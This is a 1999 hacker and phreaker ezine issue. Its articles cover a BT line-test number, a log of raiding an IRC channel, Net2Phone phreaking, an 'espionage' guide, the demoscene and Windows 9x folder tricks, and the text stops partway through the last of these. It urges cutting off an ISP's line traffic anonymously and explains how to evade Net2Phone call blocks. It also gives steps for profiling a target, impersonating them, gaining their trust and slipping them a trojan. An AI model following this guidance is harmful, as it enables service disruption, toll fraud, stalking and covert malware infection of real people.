UNDERGROUND PERIODICAL
"We're On The Up and Up"

:..:..::..Issue..::..:..:

Issue 6 - October 1999

:..:..::..Staff..::..:..:

CrossFire - Editor
ergophobe (Walrus) - Writer
Darkflame - Writer

::::::::..:..::.Website.::..:..::::::::

http://members.xoom.com/under_p

:..:..::..Email..::..:..:

under_p@yahoo.com

:.:.Alternative Hosts.:.:

ftp://t245.dccnet.com:95001
http://www.swateam.org
http://surf.to/maquishacker

:..::..Introduction.::..:

<*> As you can see, sadly Cyborg has left the UP staff, and I (CrossFire) have replaced him as editor. Cyborg left because of his upcoming exams (good luck btw m8), his new part time job (Work - Aargh), and the removal of the page from Ecad.org. Sadly HitMan has left the staff too; I was actually expecting that, because HitMan and Cyborg are friends irl, and he doesn't have time for the mag any more. Still, we have a new staff member this month: Walrus (or ergophobe, as you may know him) will now be doing some reviews of up and coming producers.

Over the next couple of issues you will notice a change in the topics covered in UP. We will still be doing the same Hack / Phreak / General Underground stuff, but the mag will start to showcase more stuff to do with the Demoscene and the Tracker Scene. I also hope that the mag will have a lot more technical articles.

We have also formed an alliance with APT, Swat and Prick - find out more on the Krash website (http://surf.to/krash).

Some of these articles were included without the permission of the authors - this is mostly because I simply couldn't contact them, most likely because they include no contact details in the files.
All the files in UP6 are top quality (well, I think so) - no crap will go into this mag (except some IRC logs :)

<*> Thanks to everyone who contributed to UP6. Most shouts are at the bottom. If I forget you then sorry - I'm a forgetful person generally :)

CrossFire

:..::.:..Contents.:.::..:

<*>  0 - Introduction And Contents....: CrossFire
<*>  1 - More Fun With A Phone........: ergophobe
<*>  2 - Invasion of #smurf...........: #cocytusUK
<*>  3 - A Phreaks Guide to net2phone.: Mob Boss
<*>  4 - Virtual Espionage............: Mob Boss
<*>  5 - Intro To The Demoscene.......: CrossFire
<*>  6 - More 'features' in Win 9x....: ergophobe
<*>  7 - LameLog......................: Exegency
<*>  8 - Compuserve Password Finder...: Exegency
<*>  9 - Underground Music Reviews....: Walrus & CrossFire
<*> 10 - IP Spanking..................: #hackphreak
<*> 11 - Pirch Passwords..............: Exegency
<*> 12 - Mr Brewer The Pirate.........: Bruce Orwall
<*> 13 - The ICQ So Called Protocol...: Bugtraq
<*> 14 - ICQ Homepage Exploit.........: Shadow51
<*> 15 - Beginners Phreaking In The UK: uV & Senor Cardini
<*> 16 - Hit The Major Search Engines.: Author Unknown

:..:URL Of The Month.:..:

Hack / Phreak
  http://surf.to/krash
  *Excellent* site run by the APT boys. Home of the Underground Alliance.

Hardcore
  http://www.walrus.bog.net
  Excellent site run by UP writer Walrus
  AND
  http://www.happycore.co.uk
  The Dizzy Kru - soon to be open

Demoscene
  http://www.ukscene.org
  UKScene - Dejavu - pukka

:..::..Shouts..::..:

CrossFire's shouts: Cyborg, ergophobe, Darkflame, Erebus, Ody, DanNet, Netw0rk Bug, Firestarter, Brakis, crashd, tefx, linealtap, Megan, Sunburst, Darkcyde, Maquis Hacker, Exegency, Mob Boss, Shadow51, The Bugtraq List, DJ Majestik, DJ Smurf, DJ H@TTRiXX, MC C@TTYSARX, the rest of the Dizzy Kru, The Oldskool List, and the HappyCore List.

Send all praise, fanmail, gifts and e-cards to crossfire@hackers-uk.freeserve.co.uk .
Send all flames to couldnt.give@toss.co.uk

ergophobe's shouts: Erebus, psi, Pyr0-Pr0xy, CrossFire, Tefx, linealtap, everybody I forgot and 'The New York Bagel co.' (food of the gods). (And food of ergophobe by the looks of it :-) - Ed)

And if anybody wants to get in contact with me, send all your comments/feedback/fan mail/gratuitous abuse to ergophobe@dial.pipex.com

UP PRESENTS:

More fun with a phone
~~~~~~~~~~~~~~~~~~~~~
By: ergophobe

Short and sweet I know, but there's really not a lot to be said. There have been a lot of articles written about using 175 and 17070 to perform tasks such as ringback, linetests and shutting down the line. Well, a friend of mine was doing an 0800 scan recently and found an alternative. 175 and 17070 are both becoming increasingly difficult to use now, and only worked on certain types of phones in the first place. This one can be dialed from every phone we've tried it on (quite a lot) including several different mobiles, land lines and just about every type of payphone we've been able to find, including a Eurobell one.

So "what is this magical number?" I hear you cry. 0800 373983 should do the job nicely. Use it in the same way that 17070 was used. For those of you who are not familiar with 17070 (if you've been living in a cave or something), first it will tell you what the number you're phoning from is, then it will just give you a list of options, and you press the button that corresponds to the option you want.

The options are:

1 - Rings the phone back when you hang up
2 - Quiet line
3 - Gives you another set of options for testing lines in various ways (this is absolutely hilarious: it says "press 1 if you have been authorised to use this system, or hang up". If BT really think anybody is going to hang up at this point they are even dumber than I thought!!!)
4 - Hangs up (clear down).

Option 3 is probably the most useful of them.
It allows you to test and shut down lines in various different ways. Possibly the best thing is the "cable pair identification" option. This will cut off any traffic to the line that you identify. Very handy for cutting people off when you want to get through. I've not tried this one YET, but a cable pair identification on an ISP could cause some serious havoc. Try it on 0845 0796699 (Freeserve) for example. This option really has some potential. If you are planning on cutting off all the traffic on the line of an ISP, for God's sake do it from a phonebox or a ripped mobile. You shouldn't really need to be reminded of these things, but anybody can make a mistake.

It is worth noting that if you're trying this from a phone which uses pulse dialing (WHY?) then you'll need your tone dialer handy, as it needs the tone for the number rather than the clicks.

I'd have to say that just about covers this particular topic, but try experimenting with the options that this little number gives you, as you never know how useful they may turn out to be.

ergophobe

#smurf Logs - By CrossFire et al
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rightie ho, here's what happened when the #apt crew invaded #smurf. Germans eh? CrossFire = OingenPoingenBoy (der), DanNet = Smurf, NBug = Netw0rk Bug, M0RPH = Erebus.

Session Start: Sun Sep 05 11:19:59 1999
*** Now talking in #Smurf
*** Topic is '#Smurf .- Oingen Poingen Drinken Doingen :) ( http://home.sol.no/~timki/smurf.html )'
*** Set by [General] on Sun Sep 05 04:08:51
-[GenBot]- Velkommen til #Smurf - CrossFire - Besøk også min hjemmeside Http://home.sol.no/~timki
*** Nbug (bug@host62-172-63-2.btinternet.com) has joined #Smurf
WHAT A SHIT CHANNEL ! LOL !
*** Nbug (bug@host62-172-63-2.btinternet.com) has left #Smurf
*** M0RPH (~m0rph@host5-171-253-27.btinternet.com) has joined #Smurf
Bwaaaaaaaaaaaaahahahahaha
Hello English People !
HELLO
Hello You German Peeeeeople!
<[SmurFen]> hi CrossFire
*** M0RPH (~m0rph@host5-171-253-27.btinternet.com) has left #Smurf
Ok thats freaking me out
All The Germans Here ! HELLO ! LOL
<[SmurFen]> lol damn!
Smurfen: So whats this chan about
*lol* My Nickname at school is smurf !
you realize that youre talking to a bot..?
Heh, my nickname at school is robin hood but i don't brag about that :P
LOL !
<[SmurFen]> lol damn!
Shut the fu** UP BOT !
heh
Bots r00l supreme :)
Hey Can I Get Ops In Here ?
no
Why ?
heh, the female smurf is pretty cute...
no way, no how
just cuz.. okki?
Oooh, I Like it when girls talk tuff :)
Shut up she anint no smurf if she won't give ops to a fellow smurf ! I bet she's not even blue
*** DanNet was kicked by Artica (I WILL, however, kick your ass outta here.. byebye sucker)
(Ed - Tuff room innit?)
*** DanNet (~Daniel_fr@host212-140-99-156.btinternet.com) has joined #Smurf
*** Artica sets mode: +b *!*@host212-140-99-156.btinternet.com
#usap
*** DanNet was kicked by mentos (banned)
dumdidumdidei..
Outta Here Bods... Respectacles :P
Session Close: Sun Sep 05 11:24:23 1999

A Phreak's Guide to Net2Phone
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By: The Mob Boss

Net2Phone (www.net2phone.com) is an Internet telephone company, which was founded under IDT Inc. They provide good rates for international and domestic phone calls, all placed over the Internet. Time is bought with a credit card right through their site or over the phone. Net2Phone is both half-duplex and full-duplex. At this time it runs on a Windows 95/98/NT platform.

One of the most appealing things to hackers and phreakers is the free registration and calls to toll free numbers. You can register and download the software all without paying a dime and then use it to place calls to 800, 877, and 888 numbers, no questions asked. This allows phreaks from other parts of the world to access numbers native to the United States and it allows domestic hackers and phreakers the opportunity to make somewhat anonymous calls.
When you make a call with Net2Phone the number will show as (212) 402-0000, a number in New York City. When you give that number a call you see it's a "non working number", or so the computer voice will tell you. So this can be used for some very devious things if one was so inclined.

Now as for some uses for this: you can use it for exchange scanning. With most telcos wising up to programs like Toneloc, scanning by hand is becoming the thing to do. Even then, it's somewhat risky, especially when dealing with toll free numbers. As we all know, the reason toll free exchanges are so feared is because of the dreaded ANI that they are equipped with. With Net2Phone you can scan and mess with whatever you like with a fairly good peace of mind. It would be far better to attempt to get into a voice mail box through Net2Phone rather than your home line, since they might notice your number keeps showing up on their bill and just give you a nice little call.

Another thing that you can do with Net2Phone is make certain calls through the operator. Now this requires a little more thought because Net2Phone doesn't really want you to call other services to place your calls. For instance 1-800-Call-ATT is blocked and so is the beloved 1-800-Collect. So to get around this we must find numbers that aren't blocked. Now this is easier than you think. Here are some useful numbers I have found not to be blocked: for an AT&T operator call 1-800-Operator, for a 1-800-Collect operator call up 1-888-Collect, for Sprint service call up 1-888-One-Dime. I am sure there are plenty more as well, so when these go dead some day just look for small companies who do collect service. From these numbers I have found you can readily do collect calls and third party billing calls. So far I haven't been able to make any operator assisted calls, but with some social engineering I am sure it's possible.
And the reason I think you may be able to eventually op divert is due to the fact you're not calling from a payphone or anything. With some hard work and patience it can be done.

Now as for the setup of Net2Phone, I have found they are not the biggest on security. Outside of the firewall I found some interesting things such as their 3Com Superstack II Switch login at 198.4.75.6. I also found what appears to be routers at 206.20.53.30, 206.20.53.46, 206.20.53.62, 206.20.53.81. So it seems their operation runs through that Superstack II switch to some sort of standard telephony switching possibly, which would obviously be some sort of electronic switching.

Another thing I have yet to mention is the fact that you can use calling cards that have toll free numbers with this service, and even use the free calling card, Freeway, available at www.broadpoint.com.

Net2Phone is an interesting and rich little service and I hope all that read this will not attempt to rip them off (too much at least) but rather learn about the new dynamic field of internet telephony, which seems to be advancing and expanding every day.

-The Mob Boss; http://mobboss.dragx.cx
Voice mail and fax: 1-877-203-3043
Edited By: Glock

* BBS LIST *
  The Sacrificial Lamb - english.gh0st.net
  Ripco BBS - ripco2.ripco.com
  The NorthLand Underground BBS - nub.dhs.org
  L0pht BBS - bbs.l0pht.com

This has been a publication written by THE MOB BOSS; he is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the user's discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only.
THE MOB BOSS (c) 1999 all rights reserved

Virtual Espionage
~~~~~~~~~~~~~~~~~
A guide to doing it and protecting yourself from it
By: The Mob Boss

Espionage is something that goes on every day. No, I am not talking about the movies and I am not talking about the bullshit you see on your local news. I am talking about the information gathering that goes on every day, specifically the kind that goes on in the vast world we call the internet. Let's face it, the net and phone network has become something of a virtual world. It's a place where shopping, work, communication, and leisure occur on a day to day basis. If you think about it, this creation of a new world was inevitable, with hundreds of people from all over the world discovering it for the first time each day. With so much information on one network, is it that bizarre to think that someone might want to gather more information than they were meant to know? To want to find out information about someone else on that vast network is not so strange when you consider the many people who LIVE on IRC and other means of communication. Not to mention, with so much money flowing through those phone and cable lines, it's obvious someone might want to steal it.

Now it's nothing to be paranoid about and it's not something to avoid the web over, it's just something to be aware of. For instance, how do you know someone you pissed off on IRC is spying on you? How do you know some law enforcement agency is not monitoring a channel or newsgroup you frequent? Well, that's what this article is about, so if you're still interested keep on reading.

Ok, so you understand there are prying eyes and ears out there, so what kind of precautions do you plan to take? That depends on what kind of things you do online. For instance, if you are some sort of holy man online then I doubt the government is concerned with you. But let's consider you someone who thinks freely and does things that might be somewhat questionable; then you might want to consider watching yourself.
The first step to becoming anonymous on the web is thinking about what forms of identification there are to tell who you really are. In real life that may be your driver's license, fingerprint, or signature. Online though, your IP, email address, and most importantly your phone number will lead back to you. The key is learning how to bypass that.

For instance, your IP address is left whenever you visit a page, whenever you sign on to chat, whenever you post to a discussion group. So what can you do about that, you ask? You can bounce your IP. Something we can use to achieve this is proxies and wingates. Now although it seems simple enough, most people don't go through the trouble of doing this for everyday things. I suggest that if you have two web browsers, at least one of those should have an HTTP proxy set up on it. So it slows you down a little, no big deal; good things come to those who wait. Here's a freebie proxy which will probably go dead as soon as I release this, proxy.escape.ca:3128; that should be placed in your preferences under proxies. Read the help file for your browser to see the specifics on how to specify your proxy. Most HTTP proxies run on either 8080 or 3128, so if that one goes dead just fire up nmap or your favorite scanner and look for IPs accepting connections on those ports.

Now for your IRC chatting you have the option of either using a wingate, which is something like a proxy that connects on port 23 and identifies itself by the "wingate>" prompt, or you can use an IRC proxy, which will probably be easier, especially if you are using some sort of mIRC. I personally like wingates when I use BitchX and proxies for when I use mIRC. That's my personal opinion, but feel free to form your own thoughts. Now if you don't already know how to use a wingate there are plenty of good texts out there on it.
One I strongly recommend is by a friend of mine, Alphavers. I don't exactly remember the name, but you can obtain it directly from him on Undernet #ANSI; he's on there all day, seven days a week. As for IRC proxies, I am not going to give a freebie of this because I don't have more than two at the moment myself. I will say though they run on port 1080 (socks proxy), so like I said earlier, fire up that IP scanner. You can also use a proxy to telnet, FTP, and even send mail by directly connecting to the SMTP port (25). As I suggested earlier, read up on wingates. If you would like to see a wingate for yourself you can always find the ones that were g-lined on IRC by giving the "/stats g" command; just look for "exploitable wingate" or "too many connections" and telnet to it. Most likely you will be sitting at the wingate prompt.

Now that you are protecting your IP, what are you doing about giving information under your own free will? One thing that a lot of people do which is very, very stupid is having their full name in their email address. If you do, then it's a good idea to keep that email address private and open up a free web-based email address such as one available at http://mail.yahoo.com or www.hotmail.com, and use fake info, only providing your internet handle. So now, using an HTTP proxy and an email address with fake info, you have become somewhat anonymous, because those headers will automatically show the IP of your proxy rather than yours when you send an email.

Now another thing to consider is what you say online. Posting to some sex newsgroup and then using the same email address on Usenet to get involved in something else is probably a bad idea, because those records of where you post are available to the public through www.dejanews.com and will probably be dug up. Also, what do you tell people about yourself? Do you mention your real name to people? Do you tell people where you work or talk about your family? All those things can be used against you.
Someone following you around in chat may be able to gather quite an extensive amount of information about you. Keeping your mouth shut may be something that comes hard at first, but will definitely be worthwhile in the long run. You don't have to make like the dumb guard from Hogan's Heroes and do the "I know nothing" routine, but being somewhat vague is definitely something smart. You don't want to make others suspicious of you, but keeping your information private is the number one priority. Keep an eye out to see if a certain nick keeps popping up in the same channel or chat room you are in. Using the same street smarts you would use in real life is just as important on the net.

Now that you know how to protect yourself, it's time to learn how to go on the offensive. How to become the virtual James Bond. Most likely it won't be that exciting, but it may come in handy. Let's start off by sizing up the target. Who is he? What does he do online? What is it we want to know or achieve? Once you have questioned your motives you are ready to begin.

Setting up a dossier on the person is the first step. You should begin to note everything you already know about the person, such as their handle, email address, ISP, and anything else you know off the top of your head. Secondly, find out where they hang out and what handle they go by. Frequent the places they go and follow them if you can, but don't make the person suspicious or you will fuck up your whole operation. Note who their friends are. If you can get the person's AIM screen name, Yahoo Pager handle, or ICQ number, by all means add them, using any excuse you can, or don't give an excuse. If questioned by the person, ignoring them might be the best bet. Getting to know their patterns for coming online is a good idea so you can know when to expect them. Now by doing all this you are putting yourself in a position to be able to spy on them and even clone their online identity.
Posing as someone who uses AOL as his or her ISP would definitely be easy, because those accounts are not too difficult to get. Noting their ident on IRC is also a good idea if you ever plan to try to snatch information by posing as them. Now I highly recommend you do the background work before you try that, so that you don't screw up and blow your cover.

Now after you have done that, it's time to give yourself a new identity and try to get close to them. If the person is usually very friendly then it shouldn't be too hard. Hang around where they do under your new identity, which should be from a forged IP, a free email account with bogus info, and anything else someone online might have, like ICQ. Get to know the person and add to the conversations. Make friends with the person, never hinting who you are. Your own boasting is what might get you in trouble, as it always seems to do to everyone. Now for instance, if this person is into h/p, sharing some good info that you know they would be interested in is something that you should attempt. If you share enough real info with them they may trust you enough so that you can slip them a trojan if you feel the need. Now I am in NO way advocating the use of trojans, but if you must, to obtain your goal, then use your best judgement and let it be on your head. By this time you should have already checked their computer by scanning it, seeing what operating system they use as well as any security breaches that may be possible on it. Use your creativity and you will be fine. Gaining their trust is something that should not be rushed; if you do then it's highly likely that you will fail in your motives.

That's it for this article. I know this is a little different from my usual articles, but I think it's something everyone on the h/p scene should be aware of, since I have seen this on many notes throughout my career and felt it should be addressed.
-The Mob Boss; http://mobboss.dragx.cx
Voice mail and fax: 1-877-203-3043
Edited by Glock

(BBS list and disclaimer as in the previous Mob Boss article.)

Intro to The Demoscene
~~~~~~~~~~~~~~~~~~~~~~
By CrossFire

Odds on, quite a lot of the UP readers will have encountered the demoscene sometime in their underground career. If you haven't, let me explain. A demo is a program which displays graphics, music, and coding effects in one big light show, and the scene around it is called..... wait for it........ The Demoscene!

Unless you have been asleep for the past 2 or so years, you will undoubtedly have heard of the Tomb Raider series of games, made by Eidos Interactive. Some of the staff at this great software company were former members of the scene group The Black Lotus. For example, Danny Guertsen (danny.geurtsen@eidos.co.uk); IMHO Danny is the greatest graphician to ever walk this earth. Unfortunately Danny is no longer a scener, and only pixels for Eidos these days.

Important Groups to Look for:

Future Crew: These guys made some amazing demos, and really revolutionized the demo-scene in the early 90's, and did a lot to mold it into what it is today. Recently they released their (final?) demo, Final Reality.
Of course this wasn't officially a demo, neither was it officially by Future Crew. It is a 'benchmarking utility' developed by their games company Remedy Entertainment. It runs under Windows '95, and needs a hell of a machine to run at a decent frame-rate. It runs quite slow on my P133 with 3Dfx.. If you have a state-of-the-art machine with a 3D card, I'd recommend it, otherwise steer clear.. What these guys *have* proven however is that the demoscene can indeed be a road to success. They are currently developing 'Max Payne', the replacement of the 'Duke Nukem' series, for 3D Realms. They've gone totally commercial though, as I've predicted.... Some of the greets from Final Reality: Siemens Nixdorf, Intel, IBM, MICROSOFT!!! That's right: MICROSOFT!! Jeez... Their past glory can be witnessed in: Unreal, Panic, Second Reality, Yo!, and lots of other demos. Have to be seen to be believed. If you want to see what they're doing now, buy Max Payne, or that car game they did, or get hold of Final Reality.. Used to be thought of by many as the ultimate demo group. I never have shared that view, and lately my feelings in that direction have been enhanced. Pioneers of making newbies feel like lamers.. From Finland.

EMF: The Electromotive Force, to give them their full name, is one of the best groups ever, in my opinion. They were in the same league as the Future Crew, and today they go beyond what I believe the Future Crew could today, in terms of demo design. They are still going strong(?), and have had a lot of success at demo parties. You should get hold of Verses, Eclipse, Caero, and Porno. Four very good productions from EMF. (Caero was by EMF & Plant.) A lot of the EMF people are also members of Plant. They've been a bit too silent lately for my liking, and I don't think I'm the only person who noticed the disappearance of emf@mea.utu.fi.... I really hope they're not quitting. Perhaps they've dropped EMF, and merged with Plant? Anyone know? From Finland.
Triton: They've also been around as long as the others, and they made the tracker that a lot of demoscene musicians use today: FastTracker II. Triton are remembered today by many as "the ones who finally beat Future Crew", as the release of Crystal Dreams II pushed FC off the no.1 spot in the charts. They released two good demos: Crystal Dreams, and Crystal Dreams II. Today they are involved in the gaming business, and have run into a little legal trouble with GT Interactive, according to the rumours. From Sweden.

Komplex: They've been around for a while, and are among the best groups today. Dope is pretty impressive, but if you want the full experience you will need a GUS for sound. A lot of people would call Dope one of the best demos ever released, but I kind of think it lacks something. Can't quite put my finger on it.. They are obviously eager to grasp new technology, as they were the first demosceners to make good demos for both 3Dfx and Java. Their Java demo will truly blow your mind. It has proven to me that it is possible to make demos in Java. They're a brilliant group, and they make brilliant demos. Yet another example of Finnish talent. For some strange reason they are now Komplex, not Complex... From Finland.

Valhalla: Great group with huge success. They go a long way back, and are still today among the best groups. As opposed to a lot of great groups they are not arrogant, and they don't mind speaking to newbies, it seems. Nice guys. :) Check out Visions Of Light, Solstice, and their OS/2 promo demo. You'll be in for a treat. Have these guys also left the demoscene?? From England.

Hornet: Really good group. Not very many productions, but they are the foundation of the demoscene on the Internet. Without them I do not think the scene would be as international as it is today. The Hornet Archive is really as close as you'll get to the demoscene's www headquarters. Explicit is a cool demo by Hornet. From USA.
Orange: I have to admit that I don't know too much about this group. I have a few demos & intros by them, though. They're a totally different group from all the others. Originality is definitely their main trait. They are very skillful. Their productions are both weird and cool. One of the most popular groups around lately. Masses of stuff to look for; I especially like 'Compost', a '70s-style demo! Another popular demo by them is 'The Secret Life of Mr. Black'.. Weird.. From Finland (?).

Psychic Link: Pretty new group, compared to the others I've mentioned here, but they look like they have a chance of being the next revolutionaries. At least Statix, a real wizard. Act1, Juice & Headache should be seen. I also think Paper is one of the best designed 64K intros ever. From England.

COMA: A good and different demogroup. They've done some really impressive stuff, but to understand why I decided to put them here you have to see their intro Stikman. NOW! After you've seen that you'll need to know they can code other stuff as well. Then you can take a look at the demo called Control. You could watch another popular demo, Insects, or their TG98 demo. It may just be a joke for TG98, but in their TG98 demo they call themselves KOMA, like Complex called themselves Komplex. From Finland.

TBL: The Black Lotus are the undisputed rulers of stuffing the most data into 64K. Way to go! I would be impressed if their 64 KB intros were 2 MB demos! Take a look at Jizz or Stash to see what I mean. From Holland & Sweden.

Pulse: I love them for their blend of oldskool style combined with their up-to-date coding. Today's code/gfx/music, yesterday's superior style. Brilliant group, currently no.1 on the Hornet Charts. Take a look at Square, Tribes, Reve, Broken Pipe, Sink, and lots of other stuff. From Poland & France.
(Group listing taken from the Demoscene Starter Kit V3.0)

Where to Meet Sceners
---------------------

IRC
---

IRC is probably the greatest way to meet sceners from all over the world, so I have included a listing (categorised by server) of some of the best channels to meet demosceners from all around the world.

Note: You must have an IRC client to be able to access IRC - try www.mirc.co.uk for Windows 95 or www.bitchx.com for Unix.

IRCNET (irc.stealth.net)
------------------------

Channel     Description
#coders     Probably the most well known scene IRC channel; mostly normal coders hang out here, but it is often frequented by sceners
#trax       The IRC channel for the music scene
#pixel      The graphics scene channel, famous for its spontaneous 30 min compos
#thescene   A channel for sceners on PC, C64, Amiga and loads of other platforms, formed by Surfing/Ramjam
#scene      The PC scene HQ

Local scene IRC channels

British ........... #ukscene
Czech ............. #scene.cs
Danish ............ #dk-scene
Dutch ............. #nlcoders
Finnish ........... #suomiscene
French ............ #demofr
German ............ #coders.ger, #kotraum
Hungarian ......... #scene, #coders.hu, #demoscene, #SceneChat
Israeli ........... #ilcoders
Norwegian ......... #daskmig
Polish ............ #polishscene
Slovak ............ #scene.cs
Slovenian ......... #scene.si
Swedish ........... #scene.se, #swedescene

EFnet (irc.chat.org)
--------------------

Channel     Description
#coders     As above
#trax       The friendliest chat room on IRC (apart from #upzine of course :). I often come in here, so look out for me
#pixel      Not very many people hang out here; try IRCnet for more ppl
#scene      Ditto
#thescene   Ditto

Local scene IRC channels

British ........... #ukscene
Czech ............. #scene.cs
Danish ............ #dk-scene
Dutch ............. #nlcoders
Finnish ........... #suomiscene
French ............ #demofr
German ............ #coders.ger, #kotraum
Hungarian ......... #scene, #coders.hu, #demoscene, #SceneChat
Israeli ........... #ilcoders
Norwegian ......... #daskmig
Polish ............ #polishscene
Slovak ............ #scene.cs
Slovenian ......... #scene.si
Swedish ........... #scene.se, #swedescene

SceneNet (irc.scene.org)
------------------------

SceneNet was founded as an alternative to AnotherNet, which has become largely commercial and proprietary-client orientated. The server is totally for sceners, but a bit quiet at times. For a list of all the channels, log on to this server and type /list .

------------
Demo Parties
------------

Another brilliant way to meet sceners is to go to a demoparty. What is a demoparty, you ask? Demoparties are the demoscene's answer to things like Defcon, with the difference that people take their computers, enter their demos into competitions, drink, eat, and have fun.

The Party
---------

Undoubtedly the biggest and most commercialised demoparty is TP. Held in Sweden every year, this party is famous for its bunch of Quakers in attendance; last year there was even a report that a group of Quakers complained about "those noisy competitions". Still, if you really want to be around MP3 / warez / porno trading pre-pubescent Quakers, then this one is for you.

Website: http://www.theparty.dk

Assembly
--------

Another big and commercialised party is Assembly. While this was a well respected party in years past, in the past 2 years or so it has become, well, big and commercialised. Many sceners fondly remember parties like Assembly '97, which was probably the last time Assembly was a 100% scene party. Recently though, this has changed to the level where Assembly is a clone of its big brother TP. It still gets worse: last year a local newspaper got involved and started up multiplayer gaming tournaments. Can you say lamers meeting boys and girls?

Website: http://www.assembly.org

Movement
--------

The last party I will mention, and probably the best party IMHO, is Movement.
This party has broken down so many barriers by hooking up with www.scene-central.com and starting up cyber visiting. Movement is held in Israel every year now. Movement used to be lucky if it got 80 visitors; now, with the widespread reach of the internet, by registering on the Movement website you get a login and password, and the opportunity to enter and vote on the competitions, watch the party via a webcam, and chat with the sceners actually there via IRC or a Java client. For a first-time party goer, I would definitely recommend Movement.

Website: http://www.movement.org

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Scene Resources
----------------

DemoScene archives
0-0-0-0-0-0-0-0-0-0

The best place to find all the latest scene productions is the many archives cluttered about the net, so just for you, here is a list of the best archives around:

The Hornet Archive - http://www.hornet.org
Definitely the most famous archive in the scene. Hornet is now closed for uploads, but still hosts all the best demoscene related stuff from 1992 - 1998.

Trebel - http://www.trebel.org
Trebel was started shortly after Hornet closed, as a replacement for Hornet. It is not fully started yet, but the main pages are in place and it shows promise to take over where the Hornet archive left off.

Scene.org - ftp://ftp.scene.org
Scene.org is the official replacement for Hornet, and although it has only been up and running for a while, it now hosts one of the largest archives of demoscene related material on the net.

The Skynet Archive - ftp://skynet.stack.nl/pub/demos
Skynet is the Dutch scene's main archive, hosting selected groups and diskmags (scene related ezines); this archive is the best place to get anything scene related from Holland.

Overflow - ftp://overflow.scene.org
Overflow used to be the main archive for the Dutch scene, but has recently been cleaned out and only contains a few productions.
Amber - ftp://amber.bti.pl
Amber is the main server for the Polish scene. There is really a lot of stuff. However, while it is fast in Poland, it is very slow in the rest of the world.

TEN - ftp://ftp.beit-eli.gov.il/Incoming/ten
The home of the Emag Network, this site hosts all of the diskmags that are part of The Emag Network, and some that aren't.

Aminet - http://www.aminet.org
The Amiga Network. Enough said. This server carries some of the best Amiga stuff around; I can feel the nostalgia just thinking about it :-)

Diskmags
0-0-0-0-0

Diskmags are the scene's equivalent of the underground's ezines, but with the difference that they are all bundled into one .exe file, with a great interface and often some music to listen to.

HUGI Magazine - http://home.pages.de/~hugidownload
*The* best scene mag around. Period. Hugi is edited by Adok, and features articles for the PC, Amiga and C64 scenes alike. Great interface, great graphics and brilliant music. Rating: 10/10

Shine - http://shine.scene.org
From what I have seen of this mag, this could well be the pretender to HUGI's throne. Although not full of content, the latest issues have been really good, and combined with great humour and a great interface, this one is seriously good.

Amnesia - http://amnesia-dist.future.easyspace.com
At last! A UK based scene mag. Amnesia is pretty much a one man operation (well, issue 1 is; I dunno if issue 2's out yet, that might be different), and includes articles on hacking, phreaking, the warez scene, and the demoscene! This mag has great potential, and if it keeps going I predict it will reach the top.
(These are all the diskmags I think are worth including, a) because there aren't many good diskmags around, and b) I can't remember the Imphobia URL for the life of me :P )

Demos / Intros Worth Seeing
----------------------------

Demo / Intro Name    Group        Comments
-----------------    -----        --------
Second Reality       Future Crew  Although this is old, this is the demo that got a lot of people into the scene. Not really stunning compared to newer demos, but good all the same.
Clone Meets Clone    Acme         A stunning intro from Acme. This is a must see for anyone interested in the demoscene.
Stash                TBL          Another absolutely stunning intro, this time from the legendary group The Black Lotus. The sequel to Jizz.
Jizz                 TBL          The one before Stash. Absolutely breathtaking.
Sunflower            Pulse        A real landscape in demos. Coded by the legendary Unreal. Leech this *now*.
303                  Acme         Another big step in democoding. This is Acme's best known production. A must see for anyone.
Square               Pulse        This demo is pretty recent, and won first place at the party it was released at. Even so, I cannot remember which party it was :~)
Tribes               Pulse
Boy                  Pulse        Pulse get around :) This demo is rather unique in the fact that it tells a story. A must see.
Toys                 Gods         I haven't seen this one, but it is supposed to be great. Get it anyway.

All of these demos / intros can be got from ftp://ftp.scene.org .

The End. Please send your comments on this article to: crossfire@hackers-uk.freeserve.co.uk . If this article has good feedback, I may write a series of demoscene related articles.

[ASCII art logo]

PRESENTS: More 'features' in Win 9x.
~~~~~~~~~~~~~~~~~~~~~~~~~~

Anybody running a Win 9x box, particularly one with IE4 or IE5 installed, will have noticed that some folders such as your Fonts folder, 'My Briefcase' and the 'Recycle Bin' behave differently from normal folders. Perhaps you want them to behave like normal folders, or create them in other places, or just bugger about with them a bit. Here's how it works.

In any folder such as this, there will be a hidden file called 'desktop.ini'. Opening it in an editor will show something along the lines of:

[.ShellClassInfo]
UICLSID={BD84B380-8CA2-1069-AB1D-08000948F534}

This one is taken from my Fonts folder. The '[.ShellClassInfo]' bit is found in all of these files and means nothing; it's basically a comment. The next line may vary from folder to folder. A common variation is to have CLSID instead of UICLSID. The value after the = sign is the important one, and will be different for every desktop.ini file. Creating a folder anywhere named xxx.{BD84B380-8CA2-1069-AB1D-08000948F534} (the xxx can be anything and can be any number of characters) will create a folder with the same properties as the Fonts folder. The same applies for whatever else is after the '(UI)CLSID=' bit.

When you've made yourself a few Recycle Bins and stuff, you will probably ask what exactly the point of this is. For a start, you can delete desktop.ini and make the folder behave like a normal folder, if your 'History' folder is pissing you off or something.
But more importantly, most of you will probably have seen a list looking something like this:

Network Neighborhood.{208D2C60-3AEA-1069-A2D7-08002B30309D}
Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}
My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
InterNet.{3DC7A020-0ACD-11CF-A9BB-00AA004AE837}
Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}
Brief Case.{85BBD920-42A0-1069-A2E4-08002B30309D}
Internet Explorer.{871C5380-42A0-1069-A2EA-08002B30309D}
DUN.{a4d92740-67cd-11cf-96f2-00aa00a11dd9}
Task Scheduler.{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

